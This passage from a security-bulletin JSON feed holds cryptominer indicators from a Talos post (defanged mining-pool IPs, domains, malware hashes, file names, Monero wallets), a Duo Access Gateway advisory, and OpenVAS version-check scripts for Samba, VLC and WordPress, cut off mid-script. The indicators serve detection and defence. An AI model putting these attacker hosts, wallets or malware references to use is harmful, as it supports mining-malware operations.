\n192[.]99[.]142[.]235:8220 \n192[.]99[.]142[.]240:8220 \n192[.]99[.]142[.]248:8220 \n192[.]99[.]142[.]249:3333 \n192[.]99[.]142[.]251:80 \n192[.]99[.]56[.]117:8220 \n195[.]123[.]224[.]186:8220 \n198[.]181[.]41[.]97:8220 \n202[.]144[.]193[.]110:3333 \nhxxps://github[.]com/MRdoulestar/whatMiner \n \n1e43eac49ff521912db16f7a1c6b16500f7818de9f93bb465724add5b4724a13 \ne2403b8198fc3dfdac409ea3ce313bbf12b464b60652d7e2e1bc7d6c356f7e5e \n31bae6f19b32b7bb7188dd4860040979cf6cee352d1135892d654a4df0df01c1 \ncb5936e20e77f14ea7bee01ead3fb9d3d72af62b5118898439d1d11681ab0d35 \ncfdee84680d67d4203ccd1f32faf3f13e6e7185072968d5823c1200444fdd53e \nefbde3d4a6a495bb7d90a266ab1e49879f8ac9c2378c6f39831a06b6b74a6803 \n384abd8124715a01c238e90aab031fb996c4ecbbc1b58a67d65d750c7ed45c52 \n \nSamples associated with whatMiner: \nf7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c \n1f5891e1b0bbe75a21266caee0323d91f2b40ecc4ff1ae8cc8208963d342ecb7 \n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04 \n241916012cc4288efd2a4b1f16d1db68f52e17e174425de6abee4297f01ec64f \n3138f8ea7ba45d81318729703d9140c65effc15d56e61e928474dd277c067e04 \n \nWallets \n41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo \n4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg \n46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S \n \n\n\n#### \n\n#### Tor2mine\n\n107[.]181[.]160[.]197 \n107[.]181[.]174[.]248 \n107[.]181[.]187[.]132 \nasq[.]r77vh0[.]pw \n194[.]67[.]204[.]189 \nqm7gmtaagejolddt[.]onion[.]to \nres1[.]myrms[.]pw \nhxxps://gitlab[.]com/Shtrawban \nrig[.]zxcvb[.]pw \nback123[.]brasilia[.]me \n \n91853a9cdbe33201bbd9838526c6e5907724eb28b3a3ae8b3e0126cee8a46639 32.exe \n44586883e1aa03b0400a8e394a718469424eb8c157e8760294a5c94dad3c1e19 64.exe \n3318c2a27daa773e471c6220b7aed4f64eb6a49901fa108a1519b3bbae81978f 7.exe \nc3c3eb5c8c418164e8da837eb2fdd66848e7de9085aec0fca4bb906cd69c654e 8.exe \n4238a0442850d3cd40f8fb299e39a7bd2a94231333c83a98fb4f8165d89f0f7f check1.ps1 \n904c7860f635c95a57f8d46b105efc7ec7305e24bd358ac69a9728d0d548011a checker.bat \n4f9aeb3bb627f3cad7d23b9e0aa8e2e3b265565c24fec03282d632abbb7dac33 check.hta \naf780550bc8e210fac5668626afdc9f8c7ff4ef04721613f4c72e0bdf6fbbfa3 clocal.hta \ncc7e6b15cf2b6028673ad472ef49a80d087808a45ad0dcf0fefc8d1297ad94b5 clocal.ps1 \nee66beae8d85f2691e4eb4e8b39182ea40fd9d5560e30b88dc3242333346ee02 cnew.hta \na7d5911251c1b4f54b24892e2357e06a2a2b01ad706b3bf23384e0d40a071fdb del.bat \n0f6eedc41dd8cf7a4ea54fc89d6dddaea88a79f965101d81de2f7beb2cbe1050 func.php \ne0ca80f0df651b1237381f2cbd7c5e834f0398f6611a0031d2b461c5b44815fc localcheck.bat \nb2498165df441bc33bdb5e39905e29a5deded7d42f07ad128da2c1303ad35488 scanner.ps1 \n18eda64a9d79819ec1a73935cb645880d05ba26189e0fd5f2fca0a97f3f019a9 shell.bin \n1328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc ss.exe \n112e3d3bb75e2bf88bd364a42a40434148d781ee89d29c66d17a5a154615e4b1 upd2.ps1 \ne1565b21f9475b356481ddd1dcd92cdbed4f5c7111455df4ef16b82169af0577 upd.hta \n61185ddd3e020a3dfe5cb6ed68069052fe9832b57c605311a82185be776a3212 win10.ps1 \nf1b55302d81f6897e4b2429f2efdad1755e6e0f2e07a1931bce4ecf1565ed481 zazd.bat \ncce61d346022a0192418baa7aff56ab885757f3becd357967035dd6a04bb6abf z.exe \n \n\n\n#### \n\n#### Uncategorized groups\n\n188[.]166[.]38[.]137 \n91[.]121[.]87[.]10 \n94[.]23[.]206[.]130 \n \n46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava \n44dSUmMLmqUFTWjv8tcTvbQbSnecQ9sAUT5CtbwDFcfwfSz92WwG97WahMPBdGtXGu4jWFgNtTZrbAkhFYLDFf2GAwfprEg", "reporter": "noreply@blogger.com (Nick Biasini)", "published": "2018-12-18T08:33:00", "type": "talosblog", "title": "Connecting the dots between recently active cryptominers", "enchantments": {}, "bulletinFamily": "blog", "cvelist": ["CVE-2018-11776"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-12-18T16:33:11", "id": "TALOSBLOG:EAA71FE2CFAB05696E23A5F67435416C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/DemsFFZIKpI/cryptomining-campaigns-2018.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "duo": [{"lastseen": "2018-12-18T17:32:33", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "# Duo Product Security Advisory\n\n**Advisory ID:** DUO-PSA-2018-004 \n**Publication Date:** 2018-12-18 \n**Revision Date:** 2018-12-18 \n**Status:** Confirmed, Fixed \n**Document Revision:** 1 \n\n\n## Overview\n\nDuo has identified and fixed an issue with the Duo Access Gateway (DAG). This issue could have allowed for data exposure on the DAG's filesystem for certain limited use cases as described below. Specifically, a user's primary authentication credentials could have been temporarily stored on the DAG's server -- not externally or accessible by Duo. This issue was discovered internally while working on unrelated product features. Upon discovery, Duo developed a new version of DAG that patches the issue and deletes any potentially exposed information from the filesystem. \n\n\n## Description\n\nA Duo Security employee identified a bug resulting in the exposure of user's primary authentication credentials. This exposure was limited to administrators with access to the DAG's filesystem. This bug, which affected both the Linux (Docker) and Windows versions of DAG, was further limited to deployments of the DAG that meet the following criteria: Office365 was the SAML application being authenticated to, the Basic Authentication setting was set to disabled, and the DAG was running version 1.5.0 - 1.5.5, inclusively. \n\n\n## Impact\n\nThis issue may have resulted in exposure of users' primary authentication credentials on the DAG's filesystem. This information could have been further exposed via backup or replication. \n \nDuo does not have the ability to remotely access these files as they are held within the customer's environment. Moreover, these credentials were not exposed outside of the users' organizations. \n\n\n## Affected Product(s)\n\nDuo Access Gateway (DAG) 1.5.0 - 1.5.5 \n\n\n## Solution\n\nIn order to resolve this issue, customers must update their DAG deployments to version 1.5.6. This will patch the issue and delete any potentially exposed information from the filesystem. \n \nAdministrators should also consider locations this information may have been copied to -- for example in a system backup or a failover machine. Due to the potential for user credential exposure on the DAG's filesystem, organizations that believe this information may have been duplicated or accessed should consider having users reset their passwords out of caution. \n\n\n## Vulnerability Metrics\n\n**Vulnerability Class:** CWE-313: Cleartext Storage in a File or on Disk \n**Remotely Exploitable:** [No] \n**Authentication Required:** [Partial] \n**Severity:** [Low] \n**CVSSv2 Overall Score:** 0.9 \n**CVSSv2 Group Scores:** Base: 3.7, Temporal: 2.7 \n**CVSSv2 Vector:** AV:L/AC:H/Au:M/C:C/I:N/A:N/E:U/RL:OF/RC:C/CDP:L/TD:L/CR:M/IR:ND/AR:ND \n\n\n## Timeline\n\n### 2018-12-10\n\n * 11:45 ET - Duo identifies a bug that could store user credentials on the DAG's filesystem.\n * 14:15 ET - Duo narrows the scope of the issue and determines a remediation path.\n\n### 2018-12-11\n\n * Duo compiles a list of potentially affected customers and begins patch creation.\n\n### 2018-12-12\n\n * Duo verifies a fix and begins the build & test process for a new DAG release.\n\n### 2018-12-14\n\n * Duo completes the build & quality assurance testing for a new DAG release with security fixes.\n\n### 2018-12-18\n\n * Duo distributes the PSA to potentially affected customers and releases DAG version 1.5.6. \n \n\n\n# References\n\n * CWE-313: Cleartext Storage in a File or on Disk - <https://cwe.mitre.org/data/definitions/313.html> \n \n\n\n# Credits/Contact\n\nIf you have questions regarding this issue, please contact us at: \n\n\n * support@duosecurity.com, referencing \"DUO-PSA-2018-004\" in the subject\n * our phone line at +1(844)386.6748. International customers can find our toll-free numbers here: <https://duo.com/about/contact>.", "reporter": "Duo Security Advisories", "published": "2018-12-18T05:00:00", "type": "duo", "title": "DUO-PSA-2018-004: Duo Product Security Advisory", "enchantments": {}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-12-18T05:00:00", "id": "DUO:DDCD956E9EED98264442B269B0E2983A", "href": "https://duo.com/labs/psa/duo-psa-2018-004", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-12-18T15:48:27", "references": ["https://lists.debian.org/debian-lts-announce/2018/12/msg00005.html"], "pluginID": "1361412562310891607", "description": "Several vulnerabilities have been discovered in Samba, a SMB/CIFS file,\nprint, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues:\n\nCVE-2018-14629\n\nFlorian Stuelpner discovered that Samba is vulnerable to\ninfinite query recursion caused by CNAME loops, resulting in\ndenial of service.\n\nCVE-2018-16851\n\nGarming Sam of the Samba Team and Catalyst discovered a NULL pointer\ndereference vulnerability in the Samba AD DC LDAP server allowing a\nuser able to read more than 256MB of LDAP entries to crash the Samba\nAD DC", "edition": 1, "reporter": "Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net", "published": "2018-12-18T00:00:00", "title": "Debian LTS Advisory ([SECURITY] [DLA 1607-1] samba security update)", "type": "openvas", "enchantments": {}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-16851", "CVE-2018-14629"], "modified": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310891607", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891607", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1607.nasl 12812 2018-12-18 07:16:51Z cfischer $\n#\n# Auto-generated from advisory DLA 1607-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891607\");\n script_version(\"$Revision: 12812 $\");\n script_cve_id(\"CVE-2018-14629\", \"CVE-2018-16851\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1607-1] samba security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-18 08:16:51 +0100 (Tue, 18 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-18 00:00:00 +0100 (Tue, 18 Dec 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/12/msg00005.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"samba on Debian Linux\");\n script_tag(name:\"insight\", value:\"Samba is an implementation of the SMB/CIFS protocol for Unix systems,\nproviding support for cross-platform file and printer sharing with\nMicrosoft Windows, OS X, and other Unix systems. Samba can also function\nas an NT4-style domain controller, and can integrate with both NT4 domains\nand Active Directory realms as a member server.\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2:4.2.14+dfsg-0+deb8u11.\n\nWe recommend that you upgrade your samba packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in Samba, a SMB/CIFS file,\nprint, and login server for Unix. The Common Vulnerabilities and\nExposures project identifies the following issues:\n\nCVE-2018-14629\n\nFlorian Stuelpner discovered that Samba is vulnerable to\ninfinite query recursion caused by CNAME loops, resulting in\ndenial of service.\n\nCVE-2018-16851\n\nGarming Sam of the Samba Team and Catalyst discovered a NULL pointer\ndereference vulnerability in the Samba AD DC LDAP server allowing a\nuser able to read more than 256MB of LDAP entries to crash the Samba\nAD DC's LDAP server.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-testsuite\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.2.14+dfsg-0+deb8u11\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-18T15:49:25", "references": ["https://www.videolan.org", "https://dyntopia.com/advisories/013-vlc"], "pluginID": "1361412562310814375", "description": "The host is installed with VLC media player\n and is prone to integer underflow vulnerability.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-12-17T00:00:00", "title": "VLC Media Player CAF Demuxer Integer Underflow Vulnerability (Windows)", "type": "openvas", "enchantments": {}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19857"], "modified": "2018-12-18T00:00:00", "id": "OPENVAS:1361412562310814375", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814375", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vlc_caf_demuxer_int_underflow_vuln_win.nasl 12814 2018-12-18 07:47:12Z cfischer $\n#\n# VLC Media Player CAF Demuxer Integer Underflow Vulnerability (Windows)\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation;\n# either version 2 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814375\");\n script_version(\"$Revision: 12814 $\");\n script_cve_id(\"CVE-2018-19857\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-18 08:47:12 +0100 (Tue, 18 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-17 10:49:31 +0530 (Mon, 17 Dec 2018)\");\n ## Not detecting patch lavel\n script_tag(name:\"qod\", value:\"50\");\n script_name(\"VLC Media Player CAF Demuxer Integer Underflow Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VLC media player\n and is prone to integer underflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an improper handling\n of magic cookies in Core Audio Format (CAF) files, which could result in an\n uninitialized memory read in the CAF demuxer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code in the context of affected application and failed\n exploit attempts will likely result in denial of service conditions.\");\n\n script_tag(name:\"affected\", value:\"VideoLAN VLC media player versions 3.0.4 on Windows\");\n\n script_tag(name:\"solution\", value:\"Apply patch from Reference link.\n For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://dyntopia.com/advisories/013-vlc\");\n script_xref(name:\"URL\", value:\"https://www.videolan.org\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_vlc_media_player_detect_win.nasl\");\n script_mandatory_keys(\"VLCPlayer/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvlcVer = infos['version'];\nvlcpath = infos['location'];\n\nif(version_is_equal(version:vlcVer, test_version:\"3.0.4\"))\n{\n report = report_fixed_ver(installed_version:vlcVer, fixed_version:\"3.0.4\", install_path: vlcpath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-18T15:49:19", "references": ["https://wordpress.org/download/releases/", "https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/"], "pluginID": "1361412562310112465", "description": "This host is running WordPress and is prone\n to multiple vulnerabilities.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-12-17T00:00:00", "title": "WordPress Multiple Vulnerabilities (Security Release) - December 2018 (Windows)", "type": "openvas", "enchantments": {}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-12-17T00:00:00", "id": "OPENVAS:1361412562310112465", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112465", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wordpress_mult_vuln_dec18_win.nasl 12809 2018-12-17 13:36:42Z asteins $\n#\n# WordPress Multiple Vulnerabilities (Security Release) - December 2018 (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112465\");\n script_version(\"$Revision: 12809 $\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-17 14:36:42 +0100 (Mon, 17 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-17 14:16:22 +0100 (Mon, 17 Dec 2018)\");\n\n script_name(\"WordPress Multiple Vulnerabilities (Security Release) - December 2018 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running WordPress and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - Authors could alter meta data to delete files that they weren't authorized to.\n\n - Authors could create posts of unauthorized post types with specially crafted input.\n\n - Contributors could craft meta data in a way that resulted in PHP object injection.\n\n - Contributors could edit new comments from higher-privileged users, potentially leading to a cross-site scripting vulnerability.\n\n - Specially crafted URL inputs could lead to a cross-site scripting vulnerability in some circumstances.\n WordPress itself was not affected, but plugins could be in some situations.\n\n - The user activation screen could be indexed by search engines in some uncommon configurations,\n leading to exposure of email addresses, and in some rare cases, default generated passwords.\n\n - Authors on Apache-hosted sites could upload specifically crafted files that bypass MIME verification,\n leading to a cross-site scripting vulnerability.\");\n\n script_tag(name:\"affected\", value:\"All versions since WordPress 3.7 up to 5.0.\");\n\n script_tag(name:\"solution\", value:\"The issues have been fixed in version 5.0.1.\n Updated versions of WordPress 4.9 and older releases are also available.\n For details refer to the referenced links to apply the correct fix for your specific version.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_xref(name:\"URL\", value:\"https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/\");\n script_xref(name:\"URL\", value:\"https://wordpress.org/download/releases/\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"os_detection.nasl\", \"secpod_wordpress_detect_900182.nasl\");\n script_mandatory_keys(\"wordpress/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\ninfos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE);\nvers = infos['version'];\npath = infos['location'];\n\nif(version_is_equal(version:vers, test_version:\"5.0.0\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"5.0.1\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.9.0\", test_version2:\"4.9.8\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.9.9\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.8.0\", test_version2:\"4.8.7\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.8.8\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.7.0\", test_version2:\"4.7.11\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.7.12\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.6.0\", test_version2:\"4.6.12\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.6.13\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.5.0\", test_version2:\"4.5.15\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.5.16\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.4.0\", test_version2:\"4.4.16\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.4.17\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.3.0\", test_version2:\"4.3.17\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.3.18\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.2.0\", test_version2:\"4.2.21\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.2.22\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.1.0\", test_version2:\"4.1.24\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.1.25\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"4.0.0\", test_version2:\"4.0.24\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"4.0.25\", install_path:path);\n security_message(data:report, port:port);\n 